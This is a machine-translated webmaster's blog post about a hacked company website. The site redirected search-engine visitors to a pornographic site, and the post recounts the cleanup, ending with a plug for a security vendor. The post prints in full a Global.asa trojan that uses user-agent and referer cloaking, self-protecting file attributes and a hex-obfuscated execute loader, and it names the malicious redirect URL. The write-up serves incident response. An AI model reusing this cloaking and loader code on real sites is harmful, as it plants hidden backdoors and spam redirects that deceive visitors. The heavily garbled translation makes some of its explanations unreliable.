Intermediary transaction SEO diagnosis Taobao guest Cloud host technology Hall
The most recent unit website in Baidu Search Click Open are yellow, and direct input URL is not a problem, in Baidu search is prompted for the site is black, many customers search our site have entered the yellow site, the company's image has caused a great impact, as the company's Web site technicians, has been engaged in the past 5 years old webmaster, what did not frighten, from the beginning of the analysis of the site was black reason.
Based on the collection of Baidu
Baidu site under their own website found a lot of pornographic content snapshots, what movies, what the beauty of the host, see a full of more than 300 snapshots, and then look at the site home page included, found that has been unrecognizable, Baidu snapshots are empty. The title of the website is the address of the website, the content is also empty. I realized that, the website must be K.
Open any one of these addresses, jump directly to the yellow site, the site address is: http://mrr.8800.org/mm/
The following figure:
The problem is slowly surfacing
First of all, the surface of the site is a proliferation of Web sites, are included in a number of malicious content and illegal content (including the color of the moment, and so on). Another surface feature is from the search engine to the click will automatically jump to the yellow site, you enter the site will not appear jump. At this time I fully identified the site is the problem of the program, landing space FTP found that the root directory has many unfamiliar folders, the inside of the site files can not be deleted, the old hint does not have permission to delete. Further down the level of the directory to see a strange file name, is Global.asa with Sinesafe Trojan Detection Tool detected is a Trojan file, the contents are as follows:
< script runat= "Server" >
' Web site global file
Sub Application_OnStart
End Sub
Sub Application_OnEnd
End Sub
Public Function gethtml (URL)
Set objxmlhttp=server.createobject ("Msxml2.serverxmlhttp")
Objxmlhttp.open "Get", Url,false
Objxmlhttp.setrequestheader "user", url
Objxmlhttp.send
Gethtml=objxmlhttp.responsebody
Set objxmlhttp=nothing
Set objstream = Server.CreateObject ("ADODB.stream")
objStream.Type = 1
Objstream.mode =3
objStream.Open
Objstream.write gethtml
objstream.position = 0
objStream.Type = 2
Objstream.charset = "gb2312"
gethtml = Objstream.readtext
objStream.Close
End Function
Function Check (user_agent)
Allow_agent=split ("Baiduspider,sogou,baidu,sosospider,googlebot,fast-webcrawler,msnbot,slurp,qihoobot, Youdaobot,iaskspider ",", ")
Check_agent=false
For Agenti=lbound (allow_agent) To UBound (allow_agent)
If InStr (User_agent,allow_agent (agenti)) >0 Then
Check_agent=true
Exit For
End If
Next
Check=check_agent
End Function
Function Checkrefresh ()
Checkrefresh = False
Dim Botlist,i,repls
Krobotlist = "Baidu|google|sogou|soso|yahoo|bing|youdao|qihoo|iask"
Botlist = Split (krobotlist, "|")
For i = 0 to Ubound (botlist)
If InStr (Left (Request.ServerVariables ("Http_referer"), ""), Botlist (i)) > 0 Then
Checkrefresh = True
Exit for
End If
Next
End Function
Sub Session_OnStart
On Error Resume Next
. ServerVariables ("path_translated")
Set s=server.createobject ("Scripting.FileSystemObject")
Set F=s.getfile ("//./" & Server.MapPath ("/global.asa"))
V=request.form&request.querystring
If InStr (V, ". Asa") >0 Then
f.attributes=39
Response.End ()
End If
If InStr (Name, ";") >0 OR InStr (server. MapPath ("."), ". as") >0 Then
S.getfile (name). Attributes=0
S.deletefile (name)
f.attributes=39
Response.End ()
End If
S= "636e6e62643d6c6361736528726571756573742e736572766572:o=": For I=1 to Len (s) step 2:c=mid (s,i,2): If isnumeric (Mid s,i,1)) Then:execute ("O=O&CHR (&h &c&)"): Else:execute ("O=o&chr &h" &c&mid (s,i+ 2,2) & "): I=i+2:end If:Next:execute O
End Sub
I've got a little bit of a circle watching these codes.
Baiduspider,sogou,baidu,sosospider,googlebot,fastwebcrawler,msnbot,slurp,qihoo "This line of code is the search engine's conditional jump code, That is to say, the Trojan is based on search engines, as long as it is from Baidu and Sogou and Google will jump directly to the site he set.
There are some binary code, is added a secret, I do not understand the decryption, but my analysis is his set jump URL. Looking for a few friends to look at the code, my good friend Lao Liu said there is a condition jump, is based on cookies and IP to jump, the same IP and cookies will only play the window once, will not play the window the second time. The hacker's technique is also very clever, visible for the benefit to use so sinister recruit. This code is safe and almost impossible for webmasters to detect.
If the roots are found, solve the problem
The website program source code from the space download down, put to sinesafe trojan detection tool detection, and found a lot of Trojan paper, which has global.asa z.aspx cende.asp phzltoxn.php, I do not publish the Trojan code here, nonsense not to speak more, Direct click to clear Trojan, Trojan all delete. FTP deleted files, find a space to let them in the server directly delete empty directory. The last step is to put the site's background password to get rid of last year's csdn password leak incident really let people worry about, before I was a loss, csdn password and my mailbox password are used the same, resulting in my mailbox was stolen, Alipay has been mentioned, this loss of food I was a lifetime to remember, bitten ten years shy!
When the password is changed, the address of the database then the removal of the Trojan Web site files back to the side, to upload space, site access is normal, before being hackers left Baidu traces to Baidu Complaint Center to submit, the site was black reason to write, such as Baidu Update period, the problem can be solved.
Walking all the way, very difficult, experience is the most valuable, but also hope that the above solutions can help more people in need of help. Each webmaster experience is not the same, can be selfless share, then, we webmaster Road will go farther! This article content source server security www.sinesafe.cn A5 First welcome reprint, reprint please indicate the author and the source. Thank you!